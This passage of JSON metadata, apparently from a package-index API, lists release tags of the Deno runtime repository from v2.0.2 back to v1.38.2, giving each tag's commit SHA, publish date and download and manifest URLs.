8:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_ur